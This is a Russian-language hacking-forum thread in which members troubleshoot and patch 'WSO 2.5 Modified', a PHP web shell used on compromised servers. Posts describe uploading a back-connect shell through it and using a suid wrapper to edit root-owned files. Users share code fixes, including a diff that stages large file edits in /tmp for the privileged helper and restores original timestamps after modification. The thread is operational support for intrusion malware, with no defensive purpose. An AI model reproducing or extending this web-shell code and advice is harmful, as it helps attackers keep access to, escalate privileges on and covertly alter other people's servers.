WSO 2.5 Modified

Discussion in 'Избранное' started by randman, 6 Aug 2011.

  1. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    беда, подключивает шелл, где мануал найти чтоб обычный заработал через суид?wrapper.php,wso_root.php - в данный момент использую вот это, но тоже закачка например не работает) и т.д.
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Вот хороший мануал php.net, мануальтесь на здоровье.
     
  3. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Я разрабатывал такой в своё время, в публику не выкладывал, только для своих. Но там была фишка в том - что куки ограниченного размера могут быть, и поэтому там надо было целую систему "многокуковой" (типо если не помещается, то надо делить искомое на части....) передачи данных делать...
     
  4. RaWaS

    RaWaS Member

    Joined:
    13 Jan 2010
    Messages:
    15
    Likes Received:
    7
    Reputations:
    -1
    Кто знает как в WSO закачать все отмеченные файлы либо файлы по списку?
     
  5. Qwert321

    Qwert321 Banned

    Joined:
    25 Jan 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    С самого начала непонятно, закачать или скачать?
    Если закачать(а так именно и написано) то про какой список имеется ввиду, или про отмеченные - ГДЕ?
    Но думаю имеется ввиду СКАЧАТЬ, то без упаковки никак.
     
  6. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Подскажите, плиз, этот шелл без привязки СУИДфайла может полноценно работать?
    Пока не поставил суидник, через это шелл закачал бекконнеткт, хочу переименовать - при нажатии кнопки первый раз перебросило меня в домашнюю директорию шелла. Целевой файл не переименовался. Попробовал в целевом файле изменить код - то же самое, пребрасывает в домашнюю диру, содержимое целевого файла не изменяется. Обычный WSO работает без проблем.

    UPD
    То же самое происходит и при привязке суидника. Рутовые файлы вроде бы можно редактить. но при сохранении перебрасывает в домашнюю диру, изменения не сохраняются.

    2UPD

    Посмотрел в адресную строку браузера - офигел:

    Code:
    wso2.php?text=User-agent%3A+*%0D%0ADisallow%3A+%2Fadmin_new%2F%0D%0ADisallow%3A+%2Fadmin%2..........
    3UPD
    Ошибка в яваскрипте. Вместо параметра var p2_ дублировался p1_ Решено.
     
    #86 tmp, 29 Dec 2012
    Last edited: 29 Dec 2012
  7. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Решилось что то с :

    ?
    Возникает при активном суиднике и редактировании файла больше ~20кБ
    Если файл меньший - то все ОК. Приходится юзать 2 шелла. Обычный и этот. Этим изменяю права. Обычным - редактирую файло. :)
     
  8. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Make file: (Writeable)
    -(Writable)
     
  9. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    блеать не удержался сори,но напиши в сорцах по грамотному тогда,если это задевает(***ню начинаете писать)
     
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Да ладно не расстраивайся :eek:
     
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...
     
  12. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Права-то на запись имеются?
     
  13. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Конечно, попробовал изменить дату с wso 2.4 все спокойно меняется
    Если бы не было прав, то писало бы Fail! а так вообще ничего не пишет, а перекидывает в файловый менеджер и в адресной строке - shell.php?touch=2012-12-01 14:22:54
    Изменить имя файла тоже не получается... просто прописывается в адресной строке
    shell.php?name=измененноеимя.php
    Пытаюсь изменить содержимое файла - не изменяется в адресной строке - shell.php?text=blablabla
     
    #93 Vip77, 6 Jan 2013
    Last edited: 6 Jan 2013
  14. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Неужели только у меня такое...
     
  15. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.
     
    #95 tmp, 6 Jan 2013
    Last edited: 6 Jan 2013
  16. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Файлы редактировать через этот шелл не могу. А права есть. И где там ошибка в яваскрипте не знаю... Как выложили так и юзал.
     
  17. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Строки 231 и 232

    Code:
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';    
     var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

    поменяй строку 232
    на

    Code:
        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p2_ должно быть

    ЗЫ
    Но проблему с редактированием файлов больше 20 кБ так и не решил
     
    1 person likes this.
  18. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    О спасибо, этим решилось много проблем
     
  19. Jer1cho

    Jer1cho Member

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    65
    Reputations:
    10
    Проблема в том, что к suid'нику передается сильно длинный параметр. И запрос выдает "Argument list too long".

    Решение которое пришло первым в голову (на сколько стабильно работает не знаю):

    PHP:

    diff 
    --git a/var/www/orig.php b/var/www/mod.php
    index eb36bb8
    ..0aebf2c 100644
    --- a/var/www/orig.php
    +++ b/var/www/mod.php
    @@ -104,+104,13 @@ if(get_magic_quotes_gpc()) {
     
     
     if (!empty(
    $_COOKIE[md5($_SERVER['HTTP_HOST']).'sname']) && !empty($_COOKIE[md5($_SERVER['HTTP_HOST']).'spass']) && $_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'] != '' && !defined('suid')) {
    +if(
    $_POST['p2'] == 'edit' && !empty($_POST['p3'])){
    +    
    $tmp_path '/tmp/'.str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz');
    +
    +    
    file_put_contents($tmp_path$_POST['p3']) or die('/tmp/ isn\'t writable.');
    +
    +    
    $_POST['p3'] = $tmp_path;
    +}
     
     echo 
    wsoEx($_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'].' '.$_COOKIE[md5($_SERVER['HTTP_HOST']).'spass']. ' "'.$_COOKIE[md5($_SERVER['HTTP_HOST']).'sphp'].' '.$_SERVER['SCRIPT_FILENAME'].' \''.addslashes($_COOKIE[md5($_SERVER['HTTP_HOST'])]).'\'  '.'\''.base64_encode(serialize($GLOBALS)).'\'"');
     
    @@ -
    963,13 +970,14 @@ function actionFilesTools() {
                     echo 
    'File isn\'t writeable';
                     break;
                 }
    +
                 if( !empty(
    $_POST['p3']) ) {
                     
    $time = @filemtime($_POST['p1']);
    -                
    $_POST['p3'] = substr($_POST['p3'],1);
                     
    $fp = @fopen($_POST['p1'],"w");
                     if(
    $fp) {
    -                    @
    fwrite($fp,$_POST['p3']);
    +                    @
    fwrite($fp,substr((defined('suid') ? file_get_contents($_POST['p3']) : $_POST['p3']),1));
                         @
    fclose($fp);
    +                    if(
    defined('suid')) @unlink($_POST['p3']);
                         echo 
    'Saved!<br><script>p3_="";</script>';
                         @
    touch($_POST['p1'],$time,$time);
                     }

    https://gist.github.com/c52be259912a3123b2f1

    Естественно нужны права на запись в /tmp/, можно было и иначе, просто переносить из /tmp/ используя mv, но делать лень.


    Еще как вариант можно разделять запросы на части, но это будет сильно затратно в плане выделения памяти.
     
    #99 Jer1cho, 9 Jan 2013
    Last edited: 9 Jan 2013
    1 person likes this.
  20. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Попробую поюзать! Сенкс :)